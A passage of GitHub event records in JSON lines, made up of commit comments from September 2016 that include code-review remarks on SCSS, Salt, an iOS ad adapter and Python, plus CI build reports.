percentages.\r\n\r\n### Decisions about local vs. global variables and mixins\r\n\r\nI think it's an interesting choice to declare local variables inside a SCSS partial instead of always declaring them globally in `/src/css/util/`, but how is your breakpoint mixin different from https://github.com/SCPR/scpr-style-guide/blob/master/src/css/util/_mixins.scss#L41-L53? and are those grid units really only ever going to be used in this file? Is it possible you'll need them elsewhere?"}},"created_at":"2016-09-20T18:51:08Z"}
{"id":"4591697211","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19101945,"position":null,"line":null,"path":null,"commit_id":"61cd508f127ea935f995798a6b2882e2256624a7","created_at":"2016-09-20T18:52:02Z","updated_at":"2016-09-20T18:52:02Z","body":"This change need to be backed out along with the logic change in _refresh_db_conditional"}},"created_at":"2016-09-20T18:52:02Z"}
{"id":"4591697522","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/ux-test-platform"},"payload":{"comment":{"id":19101947,"position":16,"line":289,"path":"src/test/java/origamiV2Tests/DrawerTest.java","commit_id":"02c6e3bd8a38fcfc7783a2be20fac2f22d5c98ce","created_at":"2016-09-20T18:52:06Z","updated_at":"2016-09-20T18:52:06Z","body":"So here would we assert \"focus is not back on original opener\"?"}},"created_at":"2016-09-20T18:52:06Z"}
{"id":"4591701428","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":19101955,"position":2,"line":2,"path":"spotify/script.js","commit_id":"175e20394d6ee012176b5c72c40d134aaf630de3","created_at":"2016-09-20T18:52:46Z","updated_at":"2016-09-20T18:52:46Z","body":"You should wrap this stuff in `(function() { })();` so as to not pollute the global scope"}},"created_at":"2016-09-20T18:52:46Z"}
{"id":"4591702062","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19101957,"position":null,"line":null,"path":null,"commit_id":"e375e2569fc17c953bce2449365441284c7a2d0f","created_at":"2016-09-20T18:52:52Z","updated_at":"2016-09-20T18:52:52Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#K30R-_ZcTfCGIjvMn_fGHg"}},"created_at":"2016-09-20T18:52:52Z"}
{"id":"4591703499","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19101960,"position":null,"line":null,"path":null,"commit_id":"5ef98c8da84dcf0195eb3ae9a1bf016d263cbf7e","created_at":"2016-09-20T18:53:06Z","updated_at":"2016-09-20T18:53:06Z","body":"I don't think so, I just added it in case someone will need it (it seemed to be useful). But I didn't think about `MonadIO` :)\r\n\r\nOk, let's just forget about it."}},"created_at":"2016-09-20T18:53:06Z"}
{"id":"4591711471","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":19101978,"position":56,"line":56,"path":"spotify/script.js","commit_id":"175e20394d6ee012176b5c72c40d134aaf630de3","created_at":"2016-09-20T18:54:27Z","updated_at":"2016-09-20T18:54:27Z","body":"You should not use scroll events to do this for the reasons described here: http://ejohn.org/blog/learning-from-twitter/. You should instead use a timer to periodically check the scroll position and see if it's time to get more results."}},"created_at":"2016-09-20T18:54:27Z"}
{"id":"4591711683","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19101981,"position":null,"line":null,"path":null,"commit_id":"2412c650b46d8e7eff3d9a5fb53c5eb09052c3ec","created_at":"2016-09-20T18:54:29Z","updated_at":"2016-09-20T18:54:29Z","body":"Good call, thanks."}},"created_at":"2016-09-20T18:54:29Z"}
{"id":"4591712250","type":"CommitCommentEvent","actor":{"login":"fromAtoZ"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19101988,"position":28,"line":69,"path":"Adapter/GADMAdapterMoPub.m","commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T18:54:35Z","updated_at":"2016-09-20T18:54:35Z","body":"Remove the comment as it's no longer valid."}},"created_at":"2016-09-20T18:54:35Z"}
{"id":"4591715318","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19101992,"position":9,"line":10,"path":"country_filter.rb","commit_id":"77602e2076f77b5d139e2491dda81f2e19c01639","created_at":"2016-09-20T18:55:06Z","updated_at":"2016-09-20T18:55:06Z","body":"Тут вообще-то хватило бы просто `method_name =~ /(\\?|\\.|\\=)$/` и всё :) `super` для этого метода всегда говорит `false`, остаётся `true` если условие сбылось."}},"created_at":"2016-09-20T18:55:06Z"}
{"id":"4591716116","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19101995,"position":null,"line":null,"path":null,"commit_id":"2ce8bcb6272f2995447599945384ab33e897b910","created_at":"2016-09-20T18:55:14Z","updated_at":"2016-09-20T18:55:14Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VxyhbjqAQRqbi5TXMcPr3Q"}},"created_at":"2016-09-20T18:55:14Z"}
{"id":"4591724131","type":"CommitCommentEvent","actor":{"login":"mattt416"},"repo":{"name":"evrardjp/rpc-openstack"},"payload":{"comment":{"id":19102005,"position":12,"line":12,"path":"rpcd/playbooks/ceph-mitaka-hostname-upgrade.yml","commit_id":"29aa71b8cd5ad8f18b2b36f9a56766a8df2a881a","created_at":"2016-09-20T18:56:26Z","updated_at":"2016-09-20T18:56:26Z","body":"I'm not that familiar with upstart, but if you do `start ceph-mon id=$x` instead of `start ceph-mon-all`, then `stop ceph-mon-all` will not work.  What if we do this instead?\r\n\r\n```\r\n  pre_tasks:\r\n    - name: Get mon instances\r\n      shell: ls /var/lib/ceph/mon\r\n      register: mon_instances\r\n    - name: Stop ceph-mon\r\n      shell: stop ceph-mon id={{ item|regex_replace('^ceph-', '') }}\r\n      with_items: mon_instances.stdout_lines\r\n      failed_when: false\r\n```"}},"created_at":"2016-09-20T18:56:26Z"}
{"id":"4591730851","type":"CommitCommentEvent","actor":{"login":"kevvolz"},"repo":{"name":"kevvolz/_kvpython"},"payload":{"comment":{"id":19102023,"position":null,"line":null,"path":null,"commit_id":"f06e798953661a2982785b2c43ecf903b890627f","created_at":"2016-09-20T18:57:26Z","updated_at":"2016-09-20T18:57:26Z","body":"Added to 2_PythonDataStructures"}},"created_at":"2016-09-20T18:57:26Z"}
{"id":"4591738924","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19102050,"position":null,"line":null,"path":null,"commit_id":"6e3a86b2992fc28963ce4fe7d0a1f1765e1aff6b","created_at":"2016-09-20T18:58:51Z","updated_at":"2016-09-20T18:58:51Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=76)"}},"created_at":"2016-09-20T18:58:51Z"}
{"id":"4591738984","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19102052,"position":null,"line":null,"path":null,"commit_id":"37cc5b1cb8d4554326d7419b501654d4f550c56d","created_at":"2016-09-20T18:58:51Z","updated_at":"2016-09-20T18:58:51Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=76)"}},"created_at":"2016-09-20T18:58:51Z"}
{"id":"4591738998","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19102053,"position":null,"line":null,"path":null,"commit_id":"d836e8d1929bdeec460b3880097e34617aebe8e4","created_at":"2016-09-20T18:58:51Z","updated_at":"2016-09-20T18:58:51Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=76)"}},"created_at":"2016-09-20T18:58:51Z"}
{"id":"4591741413","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19102057,"position":null,"line":null,"path":null,"commit_id":"ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004","created_at":"2016-09-20T18:59:16Z","updated_at":"2016-09-20T18:59:16Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2373 of 2374 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T18:59:16Z"}
{"id":"4591742393","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19102061,"position":null,"line":null,"path":null,"commit_id":"6aedccff67daca9a593e17a0df3188fde030e339","created_at":"2016-09-20T18:59:26Z","updated_at":"2016-09-20T18:59:26Z","body":"This change need to be backed out along with the logic change in _refresh_db_conditional\r\nand if failhard is to stay it should be implemented as a **kwargs/def\r\n\r\nIn fact I just notice you have broken the logic in get_repo_data      \r\n\r\n@UtahDave  This is going to need to be completely re-tested as this is no longer a code clean up."}},"created_at":"2016-09-20T18:59:26Z"}
{"id":"4591744609","type":"CommitCommentEvent","actor":{"login":"adam-power"},"repo":{"name":"openshift/openshift-ansible"},"payload":{"comment":{"id":19102068,"position":null,"line":null,"path":null,"commit_id":"be8ada8017881f349a68759d95cf31c28ebed86d","created_at":"2016-09-20T18:59:48Z","updated_at":"2016-09-20T18:59:48Z","body":"I had the same issue as above.  Rolling back to commit 887d12cfabc53f3d9e9e4befc32beba343fbef85 worked for me, and all of the other tasks in the file seem to change the file properly.  OPTIONS, CONFIG_FILE and IMAGE_VERSION are all set in the config file.  We are both installing origin, not enterprise."}},"created_at":"2016-09-20T18:59:48Z"}
{"id":"4591744854","type":"CommitCommentEvent","actor":{"login":"fromAtoZ"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19102069,"position":74,"line":185,"path":"Adapter/GADMAdapterMoPub.m","commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T18:59:50Z","updated_at":"2016-09-20T18:59:50Z","body":"Uncomment?"}},"created_at":"2016-09-20T18:59:50Z"}
{"id":"4591748534","type":"CommitCommentEvent","actor":{"login":"azzenovic"},"repo":{"name":"azzenovic/UrukCloudIDE"},"payload":{"comment":{"id":19102078,"position":null,"line":null,"path":null,"commit_id":"50158d1e28d1c7adbab3d7f462ae2e847acf928c","created_at":"2016-09-20T19:00:25Z","updated_at":"2016-09-20T19:00:25Z","body":"Merged successfully thanks!"}},"created_at":"2016-09-20T19:00:25Z"}
{"id":"4591754276","type":"CommitCommentEvent","actor":{"login":"rsatrasala"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19102090,"position":74,"line":185,"path":"Adapter/GADMAdapterMoPub.m","commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T19:01:24Z","updated_at":"2016-09-20T19:01:24Z","body":"I have made those changes in the next checkin. But sharing this diff as you can see most changes. This is uncommented and some more commented code below is cleaned up"}},"created_at":"2016-09-20T19:01:24Z"}
{"id":"4591755689","type":"CommitCommentEvent","actor":{"login":"SeemaKumaran"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19102096,"position":null,"line":null,"path":null,"commit_id":"0b3050b1808fe0e1c899c5c59a79a36b3b1e946f","created_at":"2016-09-20T19:01:38Z","updated_at":"2016-09-20T19:01:38Z","body":"In any case, I don need to show the function name applied on the metrics. The alias name replaces only the metric name, function name will display in graph. Thats why I manipulated the response to discard function name."}},"created_at":"2016-09-20T19:01:38Z"}
{"id":"4591756702","type":"CommitCommentEvent","actor":{"login":"prezzemolo"},"repo":{"name":"prezzemolo/melone"},"payload":{"comment":{"id":19102100,"position":null,"line":null,"path":null,"commit_id":"f6147d8c4f065fbf0e4abbc2061ec3386f83c177","created_at":"2016-09-20T19:01:49Z","updated_at":"2016-09-20T19:01:49Z","body":"read `link` as `line`"}},"created_at":"2016-09-20T19:01:49Z"}
{"id":"4591757358","type":"CommitCommentEvent","actor":{"login":"gogrowdev"},"repo":{"name":"gogrowdev/growicon.png"},"payload":{"comment":{"id":19102103,"position":null,"line":null,"path":null,"commit_id":"6dd4258a9a5b80277871ab91bf94db2db2827189","created_at":"2016-09-20T19:01:55Z","updated_at":"2016-09-20T19:01:55Z","body":"![grow-mark-rgb-07-256x256](https://cloud.githubusercontent.com/assets/14880526/18684718/66b83d64-7f32-11e6-9e23-713015988aee.png)\r\n"}},"created_at":"2016-09-20T19:01:55Z"}
{"id":"4591760126","type":"CommitCommentEvent","actor":{"login":"pgid69"},"repo":{"name":"pgid69/bcm63xx-phone"},"payload":{"comment":{"id":19102112,"position":null,"line":null,"path":null,"commit_id":"97ee3a0dfa9e8b7b32c62e905e724fc4cd5ddaa4","created_at":"2016-09-20T19:02:20Z","updated_at":"2016-09-20T19:02:20Z","body":"Hi\r\n\r\nNo i didn't because :\r\n1) in my opinion, procedure for submitting a patch is a bit complicated\r\n2) there's no more activity on openwrt. It seems that all developpers have moved to [LEDE project](https://www.lede-project.org/) (from what i understand it has a more simple way to handle an external patch)\r\n"}},"created_at":"2016-09-20T19:02:20Z"}
{"id":"4591761157","type":"CommitCommentEvent","actor":{"login":"sdodson"},"repo":{"name":"openshift/openshift-ansible"},"payload":{"comment":{"id":19102115,"position":null,"line":null,"path":null,"commit_id":"be8ada8017881f349a68759d95cf31c28ebed86d","created_at":"2016-09-20T19:02:31Z","updated_at":"2016-09-20T19:02:31Z","body":"Should be fixed on master via #2474"}},"created_at":"2016-09-20T19:02:31Z"}
{"id":"4591762153","type":"CommitCommentEvent","actor":{"login":"Emral"},"repo":{"name":"WohlSoft/LunaLUA"},"payload":{"comment":{"id":19102117,"position":null,"line":null,"path":null,"commit_id":"3fb1086dd1e855ee7c00c40670d55ca55092c1d5","created_at":"2016-09-20T19:02:40Z","updated_at":"2016-09-20T19:02:40Z","body":"I think the new filenames should follow an inwards execution order and not just be merely a different way to name them. Right now the execution order is lunadll --> lunaworld --> lunaglobal, when global --> luna (episode) --> luna (level) is MUCH better."}},"created_at":"2016-09-20T19:02:40Z"}
{"id":"4591766677","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19102131,"position":null,"line":null,"path":null,"commit_id":"6aedccff67daca9a593e17a0df3188fde030e339","created_at":"2016-09-20T19:03:25Z","updated_at":"2016-09-20T19:03:25Z","body":"This code change was over 10 days of effort, if I include the previous PR to get all the logic correct and working so it was almost 0 impact from 2016.3 release."}},"created_at":"2016-09-20T19:03:25Z"}
{"id":"4591767276","type":"CommitCommentEvent","actor":{"login":"tobiasKaminsky"},"repo":{"name":"nextcloud/android"},"payload":{"comment":{"id":19102134,"position":null,"line":null,"path":null,"commit_id":"eb0612809c40d89c37c661e0de2ca88cbaf0e5c7","created_at":"2016-09-20T19:03:31Z","updated_at":"2016-09-20T19:03:31Z","body":"@jancborchardt wanted to avoid starting both sentences with \"sync\".\r\nI guess it is okay as it is the header and is more detailled explained in the second sentence."}},"created_at":"2016-09-20T19:03:31Z"}
{"id":"4591767618","type":"CommitCommentEvent","actor":{"login":"oblonski"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19102136,"position":null,"line":null,"path":null,"commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-20T19:03:35Z","updated_at":"2016-09-20T19:03:35Z","body":">arrivaltime(D1) – arrivaltime(P1) < maxTimeInVehicle, yes? (or similarly, arrivaltime(D1) – leavetime(P1) < maxTimeInVehicle).\r\n\r\nYes, it is activityStart(D1) - activityEnd(P1)\r\n\r\nWhat I did is the following: \r\nLet me assume the following route and corresponding act start/end times: Start, P1, D1, End (0,10,20,30), and let me assume a max_in_vehicle_time for the shipment (P1,D1) of 20. For each activity I am now interested in its global slack time (the time I can shift the activity forward). Note that I differentiate two types of slack time: \r\n- individual slack time (time I can shift the activity ignoring all other activities) and \r\n- global slack time (time I can shift the activity without breaking the constraints of other jobs, i.e. taking into account all other acts)\r\nSo for each activity, I have the global slack time and thus the latest activity start that ensures that I do not break any maxTimeInVehicle constraint in this route.\r\nWhen I now try to insert P2, D2, I check 3 things:\r\n- Does inserting P2 between prevAct, nextAct violates any constraint (by using latestStart(nextAct))?\r\n- Does inserting D2 between prevAct and nextAct violates the constraint of shipment (P2,D2)?\r\n- Does inserting D2 between prevAct and nextAct violates any other maxTime constraints in this route?\r\n\r\nBut let us test it with a real test case. Could you provide a simple test where you think I did not account for smth?\r\n"}},"created_at":"2016-09-20T19:03:35Z"}
{"id":"4591771657","type":"CommitCommentEvent","actor":{"login":"adamlucz90"},"repo":{"name":"adamlucz90/RecordmateAngular"},"payload":{"comment":{"id":19102149,"position":23,"line":16,"path":"api/controllers/collection.js","commit_id":"08c77236bd46beedb46073e0cbd7a81ff5e7bdf7","created_at":"2016-09-20T19:04:19Z","updated_at":"2016-09-20T19:04:19Z","body":"That's a great catch.  I had previously gone through a list of http status codes but only really paid attention to the 400 level errors.  I went ahead and and made all the necessary changes and it will be reflected on my next commit.  Thanks!\r\n"}},"created_at":"2016-09-20T19:04:19Z"}
{"id":"4591772604","type":"CommitCommentEvent","actor":{"login":"sonoro1234"},"repo":{"name":"supercollider/hidapi"},"payload":{"comment":{"id":19102151,"position":5,"line":433,"path":"hidapi/hidapi.h","commit_id":"3b30c96d4bb106f13fbdb694820e4028c8c90747","created_at":"2016-09-20T19:04:30Z","updated_at":"2016-09-20T19:04:30Z","body":"```\r\n`C:/SupercolliderRepos/scfork/supercollider/external_libraries/hidapi/hidapi/hidapi.h:433:9: error: 'HANDLE' does not name a type\r\n         HANDLE HID_API_EXPORT HID_API_CALL get_device_handle(hid_device *dev);\r\n         ^\r\n```\r\nperhaps could be changed to void* al least for mingw"}},"created_at":"2016-09-20T19:04:30Z"}
{"id":"4591777801","type":"CommitCommentEvent","actor":{"login":"fromAtoZ"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19102172,"position":94,"line":213,"path":"Adapter/GADMAdapterMoPub.m","commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T19:05:26Z","updated_at":"2016-09-20T19:05:26Z","body":"Using suffix isn't very robust. You can use the following const in MPNativeAdConstants.h to get main and icon images\r\nNSString *const kAdIconImageKey = @\"iconimage\";\r\nNSString *const kAdMainImageKey = @\"mainimage\";"}},"created_at":"2016-09-20T19:05:26Z"}
{"id":"4591779457","type":"CommitCommentEvent","actor":{"login":"pwalsh"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19102182,"position":75,"line":75,"path":"plumbing/bootstrap.py","commit_id":"a2da73168c29aa4af5f59986de77993339f87a58","created_at":"2016-09-20T19:05:42Z","updated_at":"2016-09-20T19:05:42Z","body":"`file` is a [builtin](https://docs.python.org/2/library/functions.html#file) and it is not correct to use builtins as variable names (generally speaking). That is why people commonly use `f` or `stream` or some such."}},"created_at":"2016-09-20T19:05:42Z"}
{"id":"4591781882","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19102188,"position":null,"line":null,"path":null,"commit_id":"b1cbe4fb362a32dccaf795fd727e5787d57c66f2","created_at":"2016-09-20T19:05:56Z","updated_at":"2016-09-20T19:05:56Z","body":"liks have pretty long cool down 20 sec on my map. if you going use it feed upgraders that top of 790 energy / 20 second you can use.. "}},"created_at":"2016-09-20T19:05:56Z"}
{"id":"4591789855","type":"CommitCommentEvent","actor":{"login":"chamath"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19102209,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-20T19:07:24Z","updated_at":"2016-09-20T19:07:24Z","body":"I'm also facing same issue. It seems issue is fixed but not release yet. We need this fix ASAP. "}},"created_at":"2016-09-20T19:07:24Z"}
{"id":"4591790797","type":"CommitCommentEvent","actor":{"login":"fromAtoZ"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19102211,"position":84,"line":203,"path":"Adapter/GADMAdapterMoPub.m","commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T19:07:34Z","updated_at":"2016-09-20T19:07:34Z","body":"remove unused code."}},"created_at":"2016-09-20T19:07:34Z"}
{"id":"4591791390","type":"CommitCommentEvent","actor":{"login":"fromAtoZ"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19102215,"position":111,"line":230,"path":"Adapter/GADMAdapterMoPub.m","commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T19:07:40Z","updated_at":"2016-09-20T19:07:40Z","body":"remove unused code."}},"created_at":"2016-09-20T19:07:40Z"}
{"id":"4591791999","type":"CommitCommentEvent","actor":{"login":"bagong"},"repo":{"name":"supercollider/hidapi"},"payload":{"comment":{"id":19102217,"position":5,"line":433,"path":"hidapi/hidapi.h","commit_id":"3b30c96d4bb106f13fbdb694820e4028c8c90747","created_at":"2016-09-20T19:07:47Z","updated_at":"2016-09-20T19:07:47Z","body":"\n> On 20 Sep 2016, at 21:04, Victor Bombi <notifications@github.com> wrote:\n> \n> `C:/SupercolliderRepos/scfork/supercollider/external_libraries/hidapi/hidapi/hidapi.h:433:9: error: 'HANDLE' does not name a type\n>          HANDLE HID_API_EXPORT HID_API_CALL get_device_handle(hid_device *dev);\n>          ^\n> perhaps could be changed to void* al least for mingw\n> \nThis is a reproducible build error with current master using MinGW. If you can fix it, *please* submit a PR, or print exactly how it should be changed and we’ll commit.\n\nThanks!!\n.r.\n"}},"created_at":"2016-09-20T19:07:47Z"}
{"id":"4591793875","type":"CommitCommentEvent","actor":{"login":"march1993"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19102222,"position":null,"line":null,"path":null,"commit_id":"7e47e4163b0af042d746f212f873a350211badff","created_at":"2016-09-20T19:08:05Z","updated_at":"2016-09-20T19:08:05Z","body":"@throni3git OK. Thank you."}},"created_at":"2016-09-20T19:08:05Z"}
{"id":"4591795467","type":"CommitCommentEvent","actor":{"login":"fromAtoZ"},"repo":{"name":"rsatrasala/Google-MoPub-Native-Adapters-iOS"},"payload":{"comment":{"id":19102226,"position":127,"line":246,"path":"Adapter/GADMAdapterMoPub.m","commit_id":"39d0b7ca7f7f8f161f4fedb2242f06947f380374","created_at":"2016-09-20T19:08:23Z","updated_at":"2016-09-20T19:08:23Z","body":"This method is not necessary as you can use NSString *const kAdIconImageKey = @\"iconimage\";\r\nNSString *const kAdMainImageKey = @\"mainimage\"; to get image keys."}},"created_at":"2016-09-20T19:08:23Z"}
{"id":"4591796806","type":"CommitCommentEvent","actor":{"login":"pwalsh"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19102228,"position":73,"line":73,"path":"plumbing/bootstrap.py","commit_id":"a2da73168c29aa4af5f59986de77993339f87a58","created_at":"2016-09-20T19:08:36Z","updated_at":"2016-09-20T19:08:36Z","body":"What are we actually gaining by asking submitters to use one format, and then converting to another?\r\n\r\nSurely YAML is more *readable* but I personally doubt it is more *writable* for non-programmers. At least, I've had very little success with that due to the critical importance of whitespace in yaml. You don't have to change it, just IMHO."}},"created_at":"2016-09-20T19:08:36Z"}
{"id":"4591802817","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19102253,"position":null,"line":null,"path":null,"commit_id":"ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004","created_at":"2016-09-20T19:09:35Z","updated_at":"2016-09-20T19:09:35Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1194 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-20T19:09:35Z"}
{"id":"4591808687","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19102268,"position":null,"line":null,"path":null,"commit_id":"ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004","created_at":"2016-09-20T19:10:28Z","updated_at":"2016-09-20T19:10:28Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T19:10:28Z"}
{"id":"4591812550","type":"CommitCommentEvent","actor":{"login":"mitraniam"},"repo":{"name":"mitraniam/Homework"},"payload":{"comment":{"id":19102276,"position":null,"line":null,"path":null,"commit_id":"93b1d773cf931b47b47e69b2a540a783be1f4b47","created_at":"2016-09-20T19:11:06Z","updated_at":"2016-09-20T19:11:06Z","body":"az sum avi i sum piqn v momenta kolegi "}},"created_at":"2016-09-20T19:11:06Z"}
{"id":"4591812838","type":"CommitCommentEvent","actor":{"login":"superkhau"},"repo":{"name":"strongloop/loopback-policy"},"payload":{"comment":{"id":19102277,"position":null,"line":null,"path":null,"commit_id":"87604ed300e5ac2f990ad9349e5cf0de7266899d","created_at":"2016-09-20T19:11:09Z","updated_at":"2016-09-20T19:11:09Z","body":"Must've forgot to do the transfer. ;) Doing now."}},"created_at":"2016-09-20T19:11:09Z"}
{"id":"4591815068","type":"CommitCommentEvent","actor":{"login":"zegervdv"},"repo":{"name":"zegervdv/iron.nvim"},"payload":{"comment":{"id":19102282,"position":null,"line":null,"path":null,"commit_id":"8ee69e4f00ac6b026ee00d622b92646de5d465b5","created_at":"2016-09-20T19:11:32Z","updated_at":"2016-09-20T19:11:32Z","body":"Sure, I was planning to, bit haven't had the time to test it thoroughly yet. "}},"created_at":"2016-09-20T19:11:32Z"}
{"id":"4591816893","type":"CommitCommentEvent","actor":{"login":"pwalsh"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19102286,"position":100,"line":100,"path":"plumbing/bootstrap.py","commit_id":"a2da73168c29aa4af5f59986de77993339f87a58","created_at":"2016-09-20T19:11:51Z","updated_at":"2016-09-20T19:11:51Z","body":"hmm. I find it weird that a yaml parse error is being swallowed elsewhere, saved in the file intended to replace the yaml, and then used as a condition here, yet if it is encountered, still goes into the pipeline? Am I missing something in the logic here?"}},"created_at":"2016-09-20T19:11:51Z"}
{"id":"4591817157","type":"CommitCommentEvent","actor":{"login":"ojhermann-ucd"},"repo":{"name":"ojhermann-ucd/comp10280"},"payload":{"comment":{"id":19102287,"position":null,"line":null,"path":null,"commit_id":"60ac65265ccda3532f983d2599249a2bf97bf1c6","created_at":"2016-09-20T19:11:54Z","updated_at":"2016-09-20T19:11:54Z","body":"[Homework Sheet 1 - 20 September 2016.docx](https://github.com/ojhermann-ucd/comp10280/files/483434/Homework.Sheet.1.-.20.September.2016.docx)\r\n"}},"created_at":"2016-09-20T19:11:54Z"}
{"id":"4591819680","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"nejenophp/nejenophp.cz"},"payload":{"comment":{"id":19102293,"position":null,"line":null,"path":null,"commit_id":"f8b93e269c229cdd3ba7d458505e5befee6f34e8","created_at":"2016-09-20T19:12:20Z","updated_at":"2016-09-20T19:12:20Z","body":"Very cool much!"}},"created_at":"2016-09-20T19:12:20Z"}
